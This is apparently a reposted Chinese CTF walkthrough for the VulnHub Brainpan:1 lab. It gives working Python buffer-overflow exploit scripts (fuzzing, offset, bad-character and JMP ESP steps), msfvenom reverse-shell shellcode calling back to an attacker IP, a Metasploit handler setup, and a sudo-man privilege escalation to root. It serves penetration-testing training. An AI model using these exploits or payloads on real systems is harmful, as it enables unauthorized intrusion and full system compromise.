OSCP难度靶机之Brainpan:1
2022-11-27 20:31:29 Author: 安全孺子牛(查看原文) 阅读量:9 收藏

虚拟机下载地址:https://www.vulnhub.com/entry/brainpan-1,51/
虚拟机简介:一个完全为OSCP制作的简单盒子
目标:1个flag
级别:中级

1、信息收集

1.1通过arp-scan检测主机IP地址

arp-scan 192.168.207.0/24

1.2 通过nmap进行端口扫描

nmap -A -sS -sV -v -p- 192.168.207.128

查看开放9999、10000端口

2、渗透测试

2.1 WEB渗透

1.站点信息收集

访问9999站点发现有提示输入信息,需要输入密码信息

通过dirb进行目录扫描未发现有用信息,访问10000端口发现一个站点信息

使用dirb进行扫描发现有一个bin目录

dirb http://192.168.207.128:10000

测试发现有一个exe文件

2.文件分析

下载文件并进行分析,查看存在一个字符串,并且后面是程序执行的显示

wget http://192.168.207.128:10000/bin/brainpan.exe
strings brainpan.exe

使用NC进行连接9999端口,并输入shitstorm提示访问权限生成

nc 192.168.207.128 9999

3.文件调试

运行文件以后发现启动后监听端口为9999

使用Immunity Debugger进行调试,并运行程序

下载地址:https://github.com/kbandla/ImmunityDebugger/releases

使用python进行测试

#!/usr/bin/python
import socket
import time
import sys

size = 100

while(size < 2500):
try:
print "\nSending evil buffer with %s bytes" % size
buffer = "A" * size

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)

s.connect(("192.168.207.131", 9999))
s.send(buffer)

s.close()

size +=100
time.sleep(3)

except:
print "\nCould not connect!"
sys.exit()

运行python脚本,发现测试1000字节程序会崩溃

4.测算偏移量

使用MSF工具生成测试payload

/usr/share/metasploit-framework/tools/exploit/pattern_create.rb -l 1000

#!/usr/bin/python
import socket

try:
print "[+] \nSending evil buffer..."
buffer = "Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9Af0Af1Af2Af3Af4Af5Af6Af7Af8Af9Ag0Ag1Ag2Ag3Ag4Ag5Ag6Ag7Ag8Ag9Ah0Ah1Ah2Ah3Ah4Ah5Ah6Ah7Ah8Ah9Ai0Ai1Ai2Ai3Ai4Ai5Ai6Ai7Ai8Ai9Aj0Aj1Aj2Aj3Aj4Aj5Aj6Aj7Aj8Aj9Ak0Ak1Ak2Ak3Ak4Ak5Ak6Ak7Ak8Ak9Al0Al1Al2Al3Al4Al5Al6Al7Al8Al9Am0Am1Am2Am3Am4Am5Am6Am7Am8Am9An0An1An2An3An4An5An6An7An8An9Ao0Ao1Ao2Ao3Ao4Ao5Ao6Ao7Ao8Ao9Ap0Ap1Ap2Ap3Ap4Ap5Ap6Ap7Ap8Ap9Aq0Aq1Aq2Aq3Aq4Aq5Aq6Aq7Aq8Aq9Ar0Ar1Ar2Ar3Ar4Ar5Ar6Ar7Ar8Ar9As0As1As2As3As4As5As6As7As8As9At0At1At2At3At4At5At6At7At8At9Au0Au1Au2Au3Au4Au5Au6Au7Au8Au9Av0Av1Av2Av3Av4Av5Av6Av7Av8Av9Aw0Aw1Aw2Aw3Aw4Aw5Aw6Aw7Aw8Aw9Ax0Ax1Ax2Ax3Ax4Ax5Ax6Ax7Ax8Ax9Ay0Ay1Ay2Ay3Ay4Ay5Ay6Ay7Ay8Ay9Az0Az1Az2Az3Az4Az5Az6Az7Az8Az9Ba0Ba1Ba2Ba3Ba4Ba5Ba6Ba7Ba8Ba9Bb0Bb1Bb2Bb3Bb4Bb5Bb6Bb7Bb8Bb9Bc0Bc1Bc2Bc3Bc4Bc5Bc6Bc7Bc8Bc9Bd0Bd1Bd2Bd3Bd4Bd5Bd6Bd7Bd8Bd9Be0Be1Be2Be3Be4Be5Be6Be7Be8Be9Bf0Bf1Bf2Bf3Bf4Bf5Bf6Bf7Bf8Bf9Bg0Bg1Bg2Bg3Bg4Bg5Bg6Bg7Bg8Bg9Bh0Bh1Bh2B"

s = socket.socket (socket.AF_INET, socket.SOCK_STREAM)

s.connect(("192.168.207.131", 9999))
s.send(buffer)

s.close()

print "\n[+] Sending buffer of " + str(len(buffer)) + " bytes..."
print "\n[+] Sending buffer: " + buffer
print "\n[+] Done!"

except:
print "\n[+] Could not connect!"

重新发起payload,获取到报错的EIP为:35724134

使用MSF工具测算准确的偏移量为524

/usr/share/metasploit-framework/tools/exploit/pattern_offset.rb -q 35724134

5.测算shellcode空间

使用A填充,使用B测试覆盖EIP

#!/usr/bin/python
import socket

try:
print "\n[+] Sending evil buffer..."
offset = "A" * 524
eip = "B" * 4

buffer = offset + eip

s = socket.socket (socket.AF_INET, socket.SOCK_STREAM)

s.connect(("192.168.207.131", 9999))
s.send(buffer)

s.close()

print "\n[+] Sending buffer of " + str(len(buffer)) + " bytes..."
print "\n[+] Sending buffer: " + buffer
print "\n[+] Done!"

except:
print "\n[+] Could not connect!"

测试已经全部发送完毕

EIP 注册表被脚本发送的4个B覆盖

验证EIP之后的shellcode是否有足够的空间

#!/usr/bin/python
import socket

try:
print "\n[+] Sending evil buffer..."
offset = "A" * 524
eip = "B" * 4
shellcode = "C" * (1000 - len(offset) - len(eip))

buffer = offset + eip + shellcode

s = socket.socket (socket.AF_INET, socket.SOCK_STREAM)

s.connect(("192.168.207.131", 9999))
s.send(buffer)

s.close()

print "\n[+] Sending buffer of " + str(len(buffer)) + " bytes..."
print "\n[+] Sending buffer: " + buffer
print "\n[+] Done!"

except:
print "\n[+] Could not connect!"

启动应用程序,重新附加 Immunity,并运行脚本

脚本发送的所有'C'字符均已收到,并且已成功覆盖 ESP 寄存器

测试坏字符

#!/usr/bin/python
import socket
badchars = (
"\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0b\x0c\x0e\x0f\x10"
"\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f\x20"
"\x21\x22\x23\x24\x27\x28\x29\x2a\x2c\x2d\x2e\x2f\x30"
"\x31\x32\x33\x34\x35\x36\x37\x38\x39\x3a\x3b\x3c\x3e\x3f\x40"
"\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a\x4b\x4c\x4d\x4e\x4f\x50"
"\x51\x52\x53\x54\x55\x56\x57\x58\x59\x5a\x5b\x5c\x5d\x5e\x5f\x60"
"\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70"
"\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7a\x7b\x7c\x7d\x7e\x7f\x80"
"\x81\x82\x83\x84\x85\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90"
"\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f\xa0"
"\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0"
"\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf\xc0"
"\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0"
"\xd1\xd2\xd3\xd4\xd5\xd6\xd7\xd8\xd9\xda\xdb\xdc\xdd\xde\xdf\xe0"
"\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0"
"\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff" )
try:
print "\n[+] Sending evil buffer..."
offset = "A" * 524
eip = "B" * 4

buffer = offset + eip + badchars

s = socket.socket (socket.AF_INET, socket.SOCK_STREAM)

s.connect(("192.168.207.131", 9999))
s.send(buffer)

s.close()

print "\n[+] Sending buffer of " + str(len(buffer)) + " bytes..."
print "\n[+] Sending buffer: " + buffer
print "\n[+] Done!"

except:
print "\n[+] Could not connect!"

除了 x00 总是被认为是坏字符,其他字符都进入了 ESP

6.查找JMP ESP地址

安装mona插件,把mona.py并存放在Immunity Debugger插件目录即可,并重启软件

https://github.com/corelan/mona

使用 !mona module找到有效的 dll/模块

寻找 JMP ESP 指令的有效操作码

msf-nasm_shell
jmp esp

使用 Mona 搜索JMP ESP指令地址查找到一个跳转指针

!mona find -s "\xff\xe4 -m "brainpan.exe"

选择字段内容为0x311712f3,在x86架构里,读取地址是由低到高的,所以是f3121731。用新找到的 JMP ESP 指令地址替换用于EIP寄存器的B字符,并添加 400 个C字符,用作 shellcode 的占位符。

7.生成反弹shell

msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=192.168.207.130 LPORT=4444 -f c -a x86 --platform linux -b "\x00" -e x86/shikata_ga_nai

将 shellcode 添加到脚本中,并在脚本开头添加10个NOP,以避免在解码阶段出错

#!/usr/bin/python
import socket
shellcode = b""
shellcode += "\xd9\xc2\xd9\x74\x24\xf4\xba\xa2\x77\xce\xcb\x58\x31\xc9"
shellcode += "\xb1\x1f\x31\x50\x1a\x83\xc0\x04\x03\x50\x16\xe2\x57\x1d"
shellcode += "\xc4\x95\xa6\x39\x2f\xca\x9b\xfe\x83\x67\x19\xb1\x42\xf1"
shellcode += "\xfc\x7c\x0a\x96\xa5\x16\xcb\x31\x96\x65\xa3\x43\x28\x7b"
shellcode += "\x68\xcd\xc9\x11\xf6\x95\x59\xb7\xa1\xac\xb8\x74\x83\x2f"
shellcode += "\xbf\xbb\x62\x29\xf1\x4f\xa8\x21\xaf\xb0\xd2\xb1\xf7\xda"
shellcode += "\xd2\xdb\x02\x92\x30\x2a\xc5\x69\x36\xc8\x15\x08\x8a\x38"
shellcode += "\xb2\x59\xf3\x07\xbc\x8d\xfc\x77\x35\x4e\x3d\x9c\x49\x50"
shellcode += "\x5d\x6f\xe1\x2f\x6f\xf0\x84\x10\x17\xe1\xdd\x19\x09\x98"
shellcode += "\x53\x73\x7a\x98\x5e\x04\xff\x5f\x18\x07\xff\x81\x60\x06"
shellcode += "\xff\x41\x90\xb2\xfe\x41\x90\xc4\xcd\xc2"
try:
print "\n[+] Sending evil buffer..."
offset = "A" * 524
eip = "\xf3\x12\x17\x31"
nops = "\x90" * 10

buffer = offset + eip + nops + shellcode

s = socket.socket (socket.AF_INET, socket.SOCK_STREAM)

s.connect(("192.168.207.128", 9999))
s.send(buffer)

s.close()

print "\n[+] Sending buffer of " + str(len(buffer)) + " bytes..."
print "\n[+] Sending buffer: " + buffer
print "\n[+] Done!"

except:
print "\n[+] Could not connect!"

配置MSF开启监听服务,并进行攻击测试成功获取到shell权限

use exploit/multi/handler
set payload linux/x86/meterpreter/reverse_tcp
set lhost 192.168.207.130
set lport 4444
run

2.2 主机渗透

1.进入主机shell

shell
python -c 'import pty; pty.spawn("/bin/bash")'

2.查看sudo权限

sudo -l

执行命令查看可以执行手工命令

sudo /home/anansi/bin/anansi_util 

使用man进行查询,发现已经正常执行man查询操作

sudo /home/anansi/bin/anansi_util manual man

3.系统提权

使用man进行提权操作,执行后输入!/bin/bah即可执行成功,并获得root权限

sudo /home/anansi/bin/anansi_util manual man

查看root目录下文件

cd /root
cat b.txt


文章来源: http://mp.weixin.qq.com/s?__biz=MzI2MDI0NTM2Nw==&mid=2247489449&idx=1&sn=e4908c43a5a359ec88982ea026e565fb&chksm=ea6dc5b1dd1a4ca75d221e38c5c3d2d6b398077bf9329b128902368f07e42d90a3df684886a2#rd
如有侵权请联系:admin#unsafe.sh